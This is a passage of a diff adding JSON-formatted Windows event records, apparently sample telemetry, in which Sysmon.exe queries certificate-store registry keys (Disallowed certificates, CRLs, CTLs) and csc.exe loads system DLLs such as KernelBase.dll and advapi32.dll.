"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + 